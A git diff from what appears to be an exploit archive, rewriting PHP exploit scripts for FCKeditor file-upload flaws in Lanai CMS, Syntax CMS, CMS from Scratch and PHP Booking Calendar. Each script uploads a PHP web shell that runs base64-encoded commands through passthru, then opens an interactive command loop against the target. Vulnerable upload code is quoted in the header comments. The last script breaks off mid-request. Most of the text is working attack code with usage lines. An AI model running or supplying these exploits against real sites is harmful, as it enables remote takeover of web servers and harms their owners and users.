+	print "\nUsage......: php $argv[0] host path";
+	print "\nExample....: php $argv[0] localhost /lanai-cms/\n";
+	die();
+}
+
+$host = $argv[1];
+$path = $argv[2];
+
+$data  = "--12345\r\n";
+$data .= "Content-Disposition: form-data; name=\"NewFile\"; filename=\"s.php.he.ll\"\r\n";
+$data .= "Content-Type: application/octet-stream\r\n\r\n";
+$data .= "<?php \${print(_code_)}.\${passthru(base64_decode(\$_SERVER[HTTP_CMD]))}.\${print(_code_)} ?>\n";
+$data .= "--12345--\r\n";
+
+$packet  = "POST {$path}include/fckeditor/editor/filemanager/upload/php/upload.php HTTP/1.0\r\n";
+$packet .= "Host: {$host}\r\n";
+$packet .= "Content-Length: ".strlen($data)."\r\n";
+$packet .= "Content-Type: multipart/form-data; boundary=12345\r\n";
+$packet .= "Connection: close\r\n\r\n";
+$packet .= $data;
+
+preg_match("/OnUploadCompleted\((.*),\"(.*)\",\"(.*)\",/i", http_send($host, $packet), $html);
+
+if (!in_array(intval($html[1]), array(0, 201))) die("\n[-] Upload failed! (Error {$html[1]})\n");
+else print "\n[-] Shell uploaded to {$html[2]}...starting it!\n";
+
+define(STDIN, fopen("php://stdin", "r"));
+
+while(1)
+{
+	print "\nlanai-shell# ";
+	$cmd = trim(fgets(STDIN));
+	if ($cmd != "exit")
+	{
+		$packet = "GET {$path}datacenter/media/{$html[3]} HTTP/1.0\r\n";
+		$packet.= "Host: {$host}\r\n";
+		$packet.= "Cmd: ".base64_encode($cmd)."\r\n";
+		$packet.= "Connection: close\r\n\r\n";
+		$output = http_send($host, $packet);
+		if (eregi("print", $output) || !eregi("_code_", $output)) die("\n[-] Exploit failed...\n");
+		$shell = explode("_code_", $output);
+		print "\n{$shell[1]}";
+	}
+	else break;
+}
+
+?>
+
+# milw0rm.com [2008-05-14]
diff --git a/platforms/php/webapps/5688.php b/platforms/php/webapps/5688.php
index 00b9fa41c..1a9816eb7 100755
--- a/platforms/php/webapps/5688.php
+++ b/platforms/php/webapps/5688.php
@@ -1,144 +1,144 @@
-<?php
-/*
- --------------------------------------------------------------
- Syntax CMS <=  1.3 (fckeditor) Arbitrary File Upload Exploit
- --------------------------------------------------------------
- 
- Gr33ts t0 : EgiX, ThE GeNeRal L0s3r , Houssamix ,Str0ke <==> special THanks to EgiX For the Exploit Code
- 
- author...: Stack
- mail.....: Ev!L
- descr:
-        if the web site change the name of path or path is /public/  you can delet /public/ in the exploit
-        in the line :
-        "POST {$path}public/fckeditor/editor/filemanager/upload/php/upload.php
- [-] vulnerable code in /public/fckeditor/editor/filemanager/upload/php/upload.php
- 
- 41. // Get the posted file.
- 42. $oFile = $_FILES['NewFile'] ;
- 43. 
- 44. // Get the uploaded file name and extension.
- 45. $sFileName = $oFile['name'] ;
- 46. $sOriginalFileName = $sFileName ;
- 47. $sExtension = substr( $sFileName, ( strrpos($sFileName, '.') + 1 ) ) ;
- 48. $sExtension = strtolower( $sExtension ) ;
- 49. 
- 50. // The the file type (from the QueryString, by default 'File').
- 51. $sType = isset( $_GET['Type'] ) ? $_GET['Type'] : 'File' ;
- 52. 
- 53. // Check if it is an allowed type.
- 54. if ( !in_array( $sType, array('File','Image','Flash','Media') ) )
- 55.     SendResults( 1, '', '', 'Invalid type specified' ) ;
- 56. 
- 57. // Get the allowed and denied extensions arrays.
- 58. $arAllowed = $Config['AllowedExtensions'][$sType] ;
- 59. $arDenied = $Config['DeniedExtensions'][$sType] ;
- 60. 
- 61. // Check if it is an allowed extension.
- 62. if ( ( count($arAllowed) > 0 && !in_array( $sExtension, $arAllowed ) ) || ( count($arDenied) > 0 && in_array( $sExtension, $arDenied ) ) )
- 63.  SendResults( '202' ) ;
- 64. 
- 65. $sErrorNumber = '0' ;
- 66. $sFileUrl  = '' ;
- 67. 
- 68. // Initializes the counter used to rename the file, if another one with the same name already exists.
- 69. $iCounter = 0 ;
- 70. 
- 71. // The the target directory.
- 72. if ( isset( $Config['UserFilesAbsolutePath'] ) )
- 73.  $sServerDir = $Config['UserFilesAbsolutePath'] ;
- 74. else
- 75.  //$sServerDir = GetRootPath() . $Config["UserFilesPath"] ;
- 76.  $sServerDir = $Config["UserFilesPath"] ;
- 77. 
- 78. while ( true )
- 79. {
- 80.  // Compose the file path.
- 81.  $sFilePath = $sServerDir . $sFileName ;
- 82. 
- 83.  // If a file with that name already exists.
- 84.  if ( is_file( $sFilePath ) )
- 85.  {
- 86.   $iCounter++ ;
- 87.   $sFileName = RemoveExtension( $sOriginalFileName ) . '(' . $iCounter . ').' . $sExtension ;
- 88.   $sErrorNumber = '201' ;
- 89.  }
- 90.  else
- 91.  {
- 92.   move_uploaded_file( $oFile['tmp_name'], $sFilePath ) ;
- 93. 
- 94.   if ( is_file( $sFilePath ) )
- 95.   {
- 96.    $oldumask = umask(0) ;
- 97.    chmod( $sFilePath, 0777 ) ;
- 98.    umask( $oldumask ) ;
- 99.   }
- 100.   
- 101.   $sFileUrl = $Config["UserFilesPath"] . $sFileName ;
- 102. 
- 103.   break ;
- 
- with a default configuration of this script, an attacker might be able to upload arbitrary files containing malicious PHP code 
-*/
-error_reporting(0);
-set_time_limit(0);
-ini_set("default_socket_timeout", 5);
-function http_send($host, $packet)
-{
- $sock = fsockopen($host, 80);
- while (!$sock)
- {
-  print "\n[-] No response from {$host}:80 Trying again...";
-  $sock = fsockopen($host, 80);
- }
- fputs($sock, $packet);
- while (!feof($sock)) $resp .= fread($sock, 1024);
- fclose($sock);
- return $resp;
-}
-print "\n+------------------------------------------------------------+";
-print "\n| Syntax CMS <=  1.3 Arbitrary File Upload Exploit by Stack  |";
-print "\n+------------------------------------------------------------+\n";
-if ($argc < 2)
-{
- print "\nUsage......: php $argv[0] host path";
- print "\nExample....: php $argv[0] localhost /Syntax/\n";
- die();
-}
-$host = $argv[1];
-$path = $argv[2];
-$data  = "--12345\r\n";
-$data .= "Content-Disposition: form-data; name=\"NewFile\"; filename=\"s.php.he.ll\"\r\n";
-$data .= "Content-Type: application/octet-stream\r\n\r\n";
-$data .= "<?php \${print(_code_)}.\${passthru(base64_decode(\$_SERVER[HTTP_CMD]))}.\${print(_code_)} ?>\n";
-$data .= "--12345--\r\n";
-$packet  = "POST {$path}public/fckeditor/editor/filemanager/upload/php/upload.php HTTP/1.0\r\n";
-$packet .= "Host: {$host}\r\n";
-$packet .= "Content-Length: ".strlen($data)."\r\n";
-$packet .= "Content-Type: multipart/form-data; boundary=12345\r\n";
-$packet .= "Connection: close\r\n\r\n";
-$packet .= $data;
-preg_match("/OnUploadCompleted\((.*),\"(.*)\",\"(.*)\",/i", http_send($host, $packet), $html);
-if (!in_array(intval($html[1]), array(0, 201))) die("\n[-] Upload failed! (Error {$html[1]})\n");
-else print "\n[-] Shell uploaded to {$html[2]}...starting it!\n";
-define(STDIN, fopen("php://stdin", "r"));
-while(1)
-{
- print "\nstack-shell# ";
- $cmd = trim(fgets(STDIN));
- if ($cmd != "exit")
- {
-  $packet = "GET {$path}datacenter/media/{$html[3]} HTTP/1.0\r\n";
-  $packet.= "Host: {$host}\r\n";
-  $packet.= "Cmd: ".base64_encode($cmd)."\r\n";
-  $packet.= "Connection: close\r\n\r\n";
-  $output = http_send($host, $packet);
-  if (eregi("print", $output) || !eregi("_code_", $output)) die("\n[-] Exploit failed...\n");
-  $shell = explode("_code_", $output);
-  print "\n{$shell[1]}";
- }
- else break;
-}
-?>
-
-# milw0rm.com [2008-05-29]
+<?php
+/*
+ --------------------------------------------------------------
+ Syntax CMS <=  1.3 (fckeditor) Arbitrary File Upload Exploit
+ --------------------------------------------------------------
+ 
+ Gr33ts t0 : EgiX, ThE GeNeRal L0s3r , Houssamix ,Str0ke <==> special THanks to EgiX For the Exploit Code
+ 
+ author...: Stack
+ mail.....: Ev!L
+ descr:
+        if the web site change the name of path or path is /public/  you can delet /public/ in the exploit
+        in the line :
+        "POST {$path}public/fckeditor/editor/filemanager/upload/php/upload.php
+ [-] vulnerable code in /public/fckeditor/editor/filemanager/upload/php/upload.php
+ 
+ 41. // Get the posted file.
+ 42. $oFile = $_FILES['NewFile'] ;
+ 43. 
+ 44. // Get the uploaded file name and extension.
+ 45. $sFileName = $oFile['name'] ;
+ 46. $sOriginalFileName = $sFileName ;
+ 47. $sExtension = substr( $sFileName, ( strrpos($sFileName, '.') + 1 ) ) ;
+ 48. $sExtension = strtolower( $sExtension ) ;
+ 49. 
+ 50. // The the file type (from the QueryString, by default 'File').
+ 51. $sType = isset( $_GET['Type'] ) ? $_GET['Type'] : 'File' ;
+ 52. 
+ 53. // Check if it is an allowed type.
+ 54. if ( !in_array( $sType, array('File','Image','Flash','Media') ) )
+ 55.     SendResults( 1, '', '', 'Invalid type specified' ) ;
+ 56. 
+ 57. // Get the allowed and denied extensions arrays.
+ 58. $arAllowed = $Config['AllowedExtensions'][$sType] ;
+ 59. $arDenied = $Config['DeniedExtensions'][$sType] ;
+ 60. 
+ 61. // Check if it is an allowed extension.
+ 62. if ( ( count($arAllowed) > 0 && !in_array( $sExtension, $arAllowed ) ) || ( count($arDenied) > 0 && in_array( $sExtension, $arDenied ) ) )
+ 63.  SendResults( '202' ) ;
+ 64. 
+ 65. $sErrorNumber = '0' ;
+ 66. $sFileUrl  = '' ;
+ 67. 
+ 68. // Initializes the counter used to rename the file, if another one with the same name already exists.
+ 69. $iCounter = 0 ;
+ 70. 
+ 71. // The the target directory.
+ 72. if ( isset( $Config['UserFilesAbsolutePath'] ) )
+ 73.  $sServerDir = $Config['UserFilesAbsolutePath'] ;
+ 74. else
+ 75.  //$sServerDir = GetRootPath() . $Config["UserFilesPath"] ;
+ 76.  $sServerDir = $Config["UserFilesPath"] ;
+ 77. 
+ 78. while ( true )
+ 79. {
+ 80.  // Compose the file path.
+ 81.  $sFilePath = $sServerDir . $sFileName ;
+ 82. 
+ 83.  // If a file with that name already exists.
+ 84.  if ( is_file( $sFilePath ) )
+ 85.  {
+ 86.   $iCounter++ ;
+ 87.   $sFileName = RemoveExtension( $sOriginalFileName ) . '(' . $iCounter . ').' . $sExtension ;
+ 88.   $sErrorNumber = '201' ;
+ 89.  }
+ 90.  else
+ 91.  {
+ 92.   move_uploaded_file( $oFile['tmp_name'], $sFilePath ) ;
+ 93. 
+ 94.   if ( is_file( $sFilePath ) )
+ 95.   {
+ 96.    $oldumask = umask(0) ;
+ 97.    chmod( $sFilePath, 0777 ) ;
+ 98.    umask( $oldumask ) ;
+ 99.   }
+ 100.   
+ 101.   $sFileUrl = $Config["UserFilesPath"] . $sFileName ;
+ 102. 
+ 103.   break ;
+ 
+ with a default configuration of this script, an attacker might be able to upload arbitrary files containing malicious PHP code 
+*/
+error_reporting(0);
+set_time_limit(0);
+ini_set("default_socket_timeout", 5);
+function http_send($host, $packet)
+{
+ $sock = fsockopen($host, 80);
+ while (!$sock)
+ {
+  print "\n[-] No response from {$host}:80 Trying again...";
+  $sock = fsockopen($host, 80);
+ }
+ fputs($sock, $packet);
+ while (!feof($sock)) $resp .= fread($sock, 1024);
+ fclose($sock);
+ return $resp;
+}
+print "\n+------------------------------------------------------------+";
+print "\n| Syntax CMS <=  1.3 Arbitrary File Upload Exploit by Stack  |";
+print "\n+------------------------------------------------------------+\n";
+if ($argc < 2)
+{
+ print "\nUsage......: php $argv[0] host path";
+ print "\nExample....: php $argv[0] localhost /Syntax/\n";
+ die();
+}
+$host = $argv[1];
+$path = $argv[2];
+$data  = "--12345\r\n";
+$data .= "Content-Disposition: form-data; name=\"NewFile\"; filename=\"s.php.he.ll\"\r\n";
+$data .= "Content-Type: application/octet-stream\r\n\r\n";
+$data .= "<?php \${print(_code_)}.\${passthru(base64_decode(\$_SERVER[HTTP_CMD]))}.\${print(_code_)} ?>\n";
+$data .= "--12345--\r\n";
+$packet  = "POST {$path}public/fckeditor/editor/filemanager/upload/php/upload.php HTTP/1.0\r\n";
+$packet .= "Host: {$host}\r\n";
+$packet .= "Content-Length: ".strlen($data)."\r\n";
+$packet .= "Content-Type: multipart/form-data; boundary=12345\r\n";
+$packet .= "Connection: close\r\n\r\n";
+$packet .= $data;
+preg_match("/OnUploadCompleted\((.*),\"(.*)\",\"(.*)\",/i", http_send($host, $packet), $html);
+if (!in_array(intval($html[1]), array(0, 201))) die("\n[-] Upload failed! (Error {$html[1]})\n");
+else print "\n[-] Shell uploaded to {$html[2]}...starting it!\n";
+define(STDIN, fopen("php://stdin", "r"));
+while(1)
+{
+ print "\nstack-shell# ";
+ $cmd = trim(fgets(STDIN));
+ if ($cmd != "exit")
+ {
+  $packet = "GET {$path}datacenter/media/{$html[3]} HTTP/1.0\r\n";
+  $packet.= "Host: {$host}\r\n";
+  $packet.= "Cmd: ".base64_encode($cmd)."\r\n";
+  $packet.= "Connection: close\r\n\r\n";
+  $output = http_send($host, $packet);
+  if (eregi("print", $output) || !eregi("_code_", $output)) die("\n[-] Exploit failed...\n");
+  $shell = explode("_code_", $output);
+  print "\n{$shell[1]}";
+ }
+ else break;
+}
+?>
+
+# milw0rm.com [2008-05-29]
diff --git a/platforms/php/webapps/5691.php b/platforms/php/webapps/5691.php
index be6cc151a..17b8dff19 100755
--- a/platforms/php/webapps/5691.php
+++ b/platforms/php/webapps/5691.php
@@ -1,133 +1,133 @@
-<?php
-
-/*
-	-----------------------------------------------------------------
-	CMS from Scratch <= 1.1.3 (fckeditor) Remote Shell Upload Exploit
-	-----------------------------------------------------------------
-	
-	author...: EgiX
-	mail.....: n0b0d13s[at]gmail[dot]com
-	
-	link.[1].: http://cmsfromscratch.com/
-	link.[2].: http://cmsfromscratch.googlecode.com/files/cmsfs114b.tgz (tested package)
-
-	[-] vulnerable code in /cms/FCKeditor/editor/filemanager/connectors/php/config.php
-	
-	27.	// SECURITY: You must explicitelly enable this "connector". (Set it to "true").
-	28.	// WARNING: don't just set "ConfigIsEnabled = true", you must be sure that only 
-	29.	//		authenticated users can access this file or use some kind of session checking.
-	30.	$Config['Enabled'] = true ; <======
-	31.	
-	32.	$path = $_SERVER["REQUEST_URI"] ;
-	33.	$relativePathFromWebServerRoot =  substr($path, 0, strpos($path, "/", 1) );
-	34.	// Coming out as /CMS, why???
-	35.	
-	36.	
-	37.	
-	38.	// Path to user files relative to the document root.
-	39.	// This is what is inserted into the HTML markup
-	40.	$Config['UserFilesPath'] = urldecode(rtrim(str_replace('cms/FCKeditor/editor/filemanager/connectors/php', '', dirname($_SERVER['SCRIPT_NAME'])), '/')) ;
-	41.	if ($Config['UserFilesPath'] == '') $Config['UserFilesPath'] = '/' ;
-	42.	
-	43.	// Fill the following value it you prefer to specify the absolute path for the user files directory. Useful if you are using a virtual directory, symbolic link or alias. Examples: 'C:\\MySite\\userfiles\\' or '/root/mysite/userfiles/'.
-	44.	// Attention: The above 'UserFilesPath' must point to the same directory.
-	45.	// BH note: This is used for browsing the server.. should equate to the real path of the folder where /cms/ is installed
-	46.	$Config['UserFilesAbsolutePath'] = realpath('../../../../../../') ;
-	47.	
-	48.	// Due to security issues with Apache modules, it is reccomended to leave the following setting enabled.
-	49.	$Config['ForceSingleExtension'] = true ;
-	50.	// Perform additional checks for image files
-	51.	// if set to true, validate image size (using getimagesize)
-	52.	$Config['SecureImageUploads'] = true;
-	53.	// What the user can do with this connector
-	54.	$Config['ConfigAllowedCommands'] = array('QuickUpload', 'FileUpload', 'GetFolders', 'GetFoldersAndFiles', 'CreateFolder') ;
-	55.	// Allowed Resource Types
-	56.	$Config['ConfigAllowedTypes'] = array('File', 'Image', 'Flash', 'Media') ;
-	57.	// For security, HTML is allowed in the first Kb of data for files having the following extensions only.
-	58.	$Config['HtmlExtensions'] = array("html", "htm", "xml", "xsd", "txt", "js") ;
-	59.	
-	60.	$Config['AllowedExtensions']['File']	= array('7z', 'aiff', 'asf', 'avi', 'bmp', 'csv', 'doc', 'fla', 'flv', 'gif', 'gz', 'gzip', 'jpeg', 'jpg', 'mid', 'mov', 'mp3', 'mp4', 'mpc', 'mpeg', 'mpg', 'ods', 'odt', 'pdf', 'php', 'png', 'ppt', 'pxd', 'qt', 'ram', 'rar', 'rm', 'rmi', 'rmvb', 'rtf', 'sdc', 'sitd', 'swf', 'sxc', 'sxw', 'tar', 'tgz', 'tif', 'tiff', 'txt', 'vsd', 'wav', 'wma', 'wmv', 'xls', 'xml', 'zip') ;
-	61.	$Config['DeniedExtensions']['File']		= array() ; <========
-	62.	$Config['FileTypesPath']['File']		= $Config['UserFilesPath'] ;
-	63.	$Config['FileTypesAbsolutePath']['File']= $Config['UserFilesAbsolutePath'] ;
-	64.	$Config['QuickUploadPath']['File']		= $Config['UserFilesPath'] ;
-	65.	$Config['QuickUploadAbsolutePath']['File']= $Config['UserFilesAbsolutePath'] ;
-
-	with a default configuration of this script, an attacker might be able to upload arbitrary files containing malicious PHP code due to
-	$Config['AllowedExtensions']['File'] array, used in IsAllowedExt() function to check the file's extension, contains also .php extension
-*/
-
-error_reporting(0);
-set_time_limit(0);
-ini_set("default_socket_timeout", 5);
-
-function http_send($host, $packet)
-{
-	$sock = fsockopen($host, 80);
-	while (!$sock)
-	{
-		print "\n[-] No response from {$host}:80 Trying again...";
-		$sock = fsockopen($host, 80);
-	}
-	fputs($sock, $packet);
-	while (!feof($sock)) $resp .= fread($sock, 1024);
-	fclose($sock);
-	return $resp;
-}
-
-print "\n+---------------------------------------------------------------+";
-print "\n| CMS from Scratch <= 1.1.3 Remote Shell Upload Exploit by EgiX |";
-print "\n+---------------------------------------------------------------+\n";
-
-if ($argc < 3)
-{
-	print "\nUsage......: php $argv[0] host path";
-	print "\nExample....: php $argv[0] localhost /";
-	print "\nExample....: php $argv[0] localhost /cms114/\n";
-	die();
-}
-
-$host = $argv[1];
-$path = $argv[2];
-
-$data  = "--12345\r\n";
-$data .= "Content-Disposition: form-data; name=\"NewFile\"; filename=\"sh.php\"\r\n";
-$data .= "Content-Type: unknown/unknown\r\n\r\n";
-$data .= "<?php \${print(_code_)}.\${passthru(base64_decode(\$_SERVER[HTTP_CMD]))}.\${print(_code_)} ?>\n";
-$data .= "--12345--\r\n";
-
-$packet  = "POST {$path}/cms/FCKeditor/editor/filemanager/connectors/php/upload.php?Type=File HTTP/1.0\r\n";
-$packet .= "Host: {$host}\r\n";
-$packet .= "Content-Length: ".strlen($data)."\r\n";
-$packet .= "Content-Type: multipart/form-data; boundary=12345\r\n";
-$packet .= "Connection: close\r\n\r\n";
-$packet .= $data;
-
-preg_match("/OnUploadCompleted\((.*),\"(.*)\",\"(.*)\",/i", http_send($host, $packet), $html);
-
-if (!in_array(intval($html[1]), array(0, 201))) die("\n[-] Upload failed! (Error {$html[1]})\n");
-else print "\n[-] Shell uploaded to {$html[2]}...starting it!\n";
-
-define(STDIN, fopen("php://stdin", "r"));
-
-while(1)
-{
-	print "\ncmsfs-shell# ";
-	$cmd = trim(fgets(STDIN));
-	if ($cmd != "exit")
-	{
-		$packet = "GET {$path}{$html[3]} HTTP/1.0\r\n";
-		$packet.= "Host: {$host}\r\n";
-		$packet.= "Cmd: ".base64_encode($cmd)."\r\n";
-		$packet.= "Connection: close\r\n\r\n";
-		$output = http_send($host, $packet);
-		if (!eregi("_code_", $output)) die("\n[-] Exploit failed...\n");
-		$shell = explode("_code_", $output);
-		print "\n{$shell[1]}";
-	}
-	else break;
-}
-
-?>
-
-# milw0rm.com [2008-05-29]
+<?php
+
+/*
+	-----------------------------------------------------------------
+	CMS from Scratch <= 1.1.3 (fckeditor) Remote Shell Upload Exploit
+	-----------------------------------------------------------------
+	
+	author...: EgiX
+	mail.....: n0b0d13s[at]gmail[dot]com
+	
+	link.[1].: http://cmsfromscratch.com/
+	link.[2].: http://cmsfromscratch.googlecode.com/files/cmsfs114b.tgz (tested package)
+
+	[-] vulnerable code in /cms/FCKeditor/editor/filemanager/connectors/php/config.php
+	
+	27.	// SECURITY: You must explicitelly enable this "connector". (Set it to "true").
+	28.	// WARNING: don't just set "ConfigIsEnabled = true", you must be sure that only 
+	29.	//		authenticated users can access this file or use some kind of session checking.
+	30.	$Config['Enabled'] = true ; <======
+	31.	
+	32.	$path = $_SERVER["REQUEST_URI"] ;
+	33.	$relativePathFromWebServerRoot =  substr($path, 0, strpos($path, "/", 1) );
+	34.	// Coming out as /CMS, why???
+	35.	
+	36.	
+	37.	
+	38.	// Path to user files relative to the document root.
+	39.	// This is what is inserted into the HTML markup
+	40.	$Config['UserFilesPath'] = urldecode(rtrim(str_replace('cms/FCKeditor/editor/filemanager/connectors/php', '', dirname($_SERVER['SCRIPT_NAME'])), '/')) ;
+	41.	if ($Config['UserFilesPath'] == '') $Config['UserFilesPath'] = '/' ;
+	42.	
+	43.	// Fill the following value it you prefer to specify the absolute path for the user files directory. Useful if you are using a virtual directory, symbolic link or alias. Examples: 'C:\\MySite\\userfiles\\' or '/root/mysite/userfiles/'.
+	44.	// Attention: The above 'UserFilesPath' must point to the same directory.
+	45.	// BH note: This is used for browsing the server.. should equate to the real path of the folder where /cms/ is installed
+	46.	$Config['UserFilesAbsolutePath'] = realpath('../../../../../../') ;
+	47.	
+	48.	// Due to security issues with Apache modules, it is reccomended to leave the following setting enabled.
+	49.	$Config['ForceSingleExtension'] = true ;
+	50.	// Perform additional checks for image files
+	51.	// if set to true, validate image size (using getimagesize)
+	52.	$Config['SecureImageUploads'] = true;
+	53.	// What the user can do with this connector
+	54.	$Config['ConfigAllowedCommands'] = array('QuickUpload', 'FileUpload', 'GetFolders', 'GetFoldersAndFiles', 'CreateFolder') ;
+	55.	// Allowed Resource Types
+	56.	$Config['ConfigAllowedTypes'] = array('File', 'Image', 'Flash', 'Media') ;
+	57.	// For security, HTML is allowed in the first Kb of data for files having the following extensions only.
+	58.	$Config['HtmlExtensions'] = array("html", "htm", "xml", "xsd", "txt", "js") ;
+	59.	
+	60.	$Config['AllowedExtensions']['File']	= array('7z', 'aiff', 'asf', 'avi', 'bmp', 'csv', 'doc', 'fla', 'flv', 'gif', 'gz', 'gzip', 'jpeg', 'jpg', 'mid', 'mov', 'mp3', 'mp4', 'mpc', 'mpeg', 'mpg', 'ods', 'odt', 'pdf', 'php', 'png', 'ppt', 'pxd', 'qt', 'ram', 'rar', 'rm', 'rmi', 'rmvb', 'rtf', 'sdc', 'sitd', 'swf', 'sxc', 'sxw', 'tar', 'tgz', 'tif', 'tiff', 'txt', 'vsd', 'wav', 'wma', 'wmv', 'xls', 'xml', 'zip') ;
+	61.	$Config['DeniedExtensions']['File']		= array() ; <========
+	62.	$Config['FileTypesPath']['File']		= $Config['UserFilesPath'] ;
+	63.	$Config['FileTypesAbsolutePath']['File']= $Config['UserFilesAbsolutePath'] ;
+	64.	$Config['QuickUploadPath']['File']		= $Config['UserFilesPath'] ;
+	65.	$Config['QuickUploadAbsolutePath']['File']= $Config['UserFilesAbsolutePath'] ;
+
+	with a default configuration of this script, an attacker might be able to upload arbitrary files containing malicious PHP code due to
+	$Config['AllowedExtensions']['File'] array, used in IsAllowedExt() function to check the file's extension, contains also .php extension
+*/
+
+error_reporting(0);
+set_time_limit(0);
+ini_set("default_socket_timeout", 5);
+
+function http_send($host, $packet)
+{
+	$sock = fsockopen($host, 80);
+	while (!$sock)
+	{
+		print "\n[-] No response from {$host}:80 Trying again...";
+		$sock = fsockopen($host, 80);
+	}
+	fputs($sock, $packet);
+	while (!feof($sock)) $resp .= fread($sock, 1024);
+	fclose($sock);
+	return $resp;
+}
+
+print "\n+---------------------------------------------------------------+";
+print "\n| CMS from Scratch <= 1.1.3 Remote Shell Upload Exploit by EgiX |";
+print "\n+---------------------------------------------------------------+\n";
+
+if ($argc < 3)
+{
+	print "\nUsage......: php $argv[0] host path";
+	print "\nExample....: php $argv[0] localhost /";
+	print "\nExample....: php $argv[0] localhost /cms114/\n";
+	die();
+}
+
+$host = $argv[1];
+$path = $argv[2];
+
+$data  = "--12345\r\n";
+$data .= "Content-Disposition: form-data; name=\"NewFile\"; filename=\"sh.php\"\r\n";
+$data .= "Content-Type: unknown/unknown\r\n\r\n";
+$data .= "<?php \${print(_code_)}.\${passthru(base64_decode(\$_SERVER[HTTP_CMD]))}.\${print(_code_)} ?>\n";
+$data .= "--12345--\r\n";
+
+$packet  = "POST {$path}/cms/FCKeditor/editor/filemanager/connectors/php/upload.php?Type=File HTTP/1.0\r\n";
+$packet .= "Host: {$host}\r\n";
+$packet .= "Content-Length: ".strlen($data)."\r\n";
+$packet .= "Content-Type: multipart/form-data; boundary=12345\r\n";
+$packet .= "Connection: close\r\n\r\n";
+$packet .= $data;
+
+preg_match("/OnUploadCompleted\((.*),\"(.*)\",\"(.*)\",/i", http_send($host, $packet), $html);
+
+if (!in_array(intval($html[1]), array(0, 201))) die("\n[-] Upload failed! (Error {$html[1]})\n");
+else print "\n[-] Shell uploaded to {$html[2]}...starting it!\n";
+
+define(STDIN, fopen("php://stdin", "r"));
+
+while(1)
+{
+	print "\ncmsfs-shell# ";
+	$cmd = trim(fgets(STDIN));
+	if ($cmd != "exit")
+	{
+		$packet = "GET {$path}{$html[3]} HTTP/1.0\r\n";
+		$packet.= "Host: {$host}\r\n";
+		$packet.= "Cmd: ".base64_encode($cmd)."\r\n";
+		$packet.= "Connection: close\r\n\r\n";
+		$output = http_send($host, $packet);
+		if (!eregi("_code_", $output)) die("\n[-] Exploit failed...\n");
+		$shell = explode("_code_", $output);
+		print "\n{$shell[1]}";
+	}
+	else break;
+}
+
+?>
+
+# milw0rm.com [2008-05-29]
diff --git a/platforms/php/webapps/5697.php b/platforms/php/webapps/5697.php
index 3a21c92cc..73b0b32cb 100755
--- a/platforms/php/webapps/5697.php
+++ b/platforms/php/webapps/5697.php
@@ -1,137 +1,137 @@
-<?php
-/*
- --------------------------------------------------------------
- PHP Booking Calendar 10 d (fckeditor) Arbitrary File Upload Exploit
- --------------------------------------------------------------
- 
-  Special thnx for : Egix
- [-] vulnerable code in /[path]/fckeditor/editor/filemanager/upload/php/upload.php
- 
- 41. // Get the posted file.
- 42. $oFile = $_FILES['NewFile'] ;
- 43.
- 44. // Get the uploaded file name and extension.
- 45. $sFileName = $oFile['name'] ;
- 46. $sOriginalFileName = $sFileName ;
- 47. $sExtension = substr( $sFileName, ( strrpos($sFileName, '.') + 1 ) ) ;
- 48. $sExtension = strtolower( $sExtension ) ;
- 49.
- 50. // The the file type (from the QueryString, by default 'File').
- 51. $sType = isset( $_GET['Type'] ) ? $_GET['Type'] : 'File' ;
- 52.
- 53. // Check if it is an allowed type.
- 54. if ( !in_array( $sType, array('File','Image','Flash','Media') ) )
- 55.     SendResults( 1, '', '', 'Invalid type specified' ) ;
- 56.
- 57. // Get the allowed and denied extensions arrays.
- 58. $arAllowed = $Config['AllowedExtensions'][$sType] ;
- 59. $arDenied = $Config['DeniedExtensions'][$sType] ;
- 60.
- 61. // Check if it is an allowed extension.
- 62. if ( ( count($arAllowed) > 0 && !in_array( $sExtension, $arAllowed ) ) || ( count($arDenied) > 0 && in_array( $sExtension, $arDenied ) ) )
- 63.  SendResults( '202' ) ;
- 64.
- 65. $sErrorNumber = '0' ;
- 66. $sFileUrl  = '' ;
- 67.
- 68. // Initializes the counter used to rename the file, if another one with the same name already exists.
- 69. $iCounter = 0 ;
- 70.
- 71. // The the target directory.
- 72. if ( isset( $Config['UserFilesAbsolutePath'] ) )
- 73.  $sServerDir = $Config['UserFilesAbsolutePath'] ;
- 74. else
- 75.  //$sServerDir = GetRootPath() . $Config["UserFilesPath"] ;
- 76.  $sServerDir = $Config["UserFilesPath"] ;
- 77.
- 78. while ( true )
- 79. {
- 80.  // Compose the file path.
- 81.  $sFilePath = $sServerDir . $sFileName ;
- 82.
- 83.  // If a file with that name already exists.
- 84.  if ( is_file( $sFilePath ) )
- 85.  {
- 86.   $iCounter++ ;
- 87.   $sFileName = RemoveExtension( $sOriginalFileName ) . '(' . $iCounter . ').' . $sExtension ;
- 88.   $sErrorNumber = '201' ;
- 89.  }
- 90.  else
- 91.  {
- 92.   move_uploaded_file( $oFile['tmp_name'], $sFilePath ) ;
- 93.
- 94.   if ( is_file( $sFilePath ) )
- 95.   {
- 96.    $oldumask = umask(0) ;
- 97.    chmod( $sFilePath, 0777 ) ;
- 98.    umask( $oldumask ) ;
- 99.   }
- 100.  
- 101.   $sFileUrl = $Config["UserFilesPath"] . $sFileName ;
- 102.
- 103.   break ;
- 
- with a default configuration of this script, an attacker might be able to upload arbitrary files containing malicious PHP code
-*/
-error_reporting(0);
-set_time_limit(0);
-ini_set("default_socket_timeout", 5);
-function http_send($host, $packet)
-{
- $sock = fsockopen($host, 80);
- while (!$sock)
- {
-  print "\n[-] No response from {$host}:80 Trying again...";
-  $sock = fsockopen($host, 80);
- }
- fputs($sock, $packet);
- while (!feof($sock)) $resp .= fread($sock, 1024);
- fclose($sock);
- return $resp;
-}
-print "\n+------------------------------------------------------------+";
-print "\n|PHP Booking Calendar 10d Arbitrary File Upload Exploit by Stack |";
-print "\n+------------------------------------------------------------+\n";
-if ($argc < 2)
-{
- print "\nUsage......: php $argv[0] host path";
- print "\nExample....: php $argv[0] localhost /booking_calendar/\n";
- die();
-}
-$host = $argv[1];
-$path = $argv[2];
-$data  = "--12345\r\n";
-$data .= "Content-Disposition: form-data; name=\"NewFile\"; filename=\"s.php.he.ll\"\r\n";
-$data .= "Content-Type: application/octet-stream\r\n\r\n";
-$data .= "<?php \${print(_code_)}.\${passthru(base64_decode(\$_SERVER[HTTP_CMD]))}.\${print(_code_)} ?>\n";
-$data .= "--12345--\r\n";
-$packet  = "POST {$path}/fckeditor/editor/filemanager/upload/php/upload.php HTTP/1.0\r\n";
-$packet .= "Host: {$host}\r\n";
-$packet .= "Content-Length: ".strlen($data)."\r\n";
-$packet .= "Content-Type: multipart/form-data; boundary=12345\r\n";
-$packet .= "Connection: close\r\n\r\n";
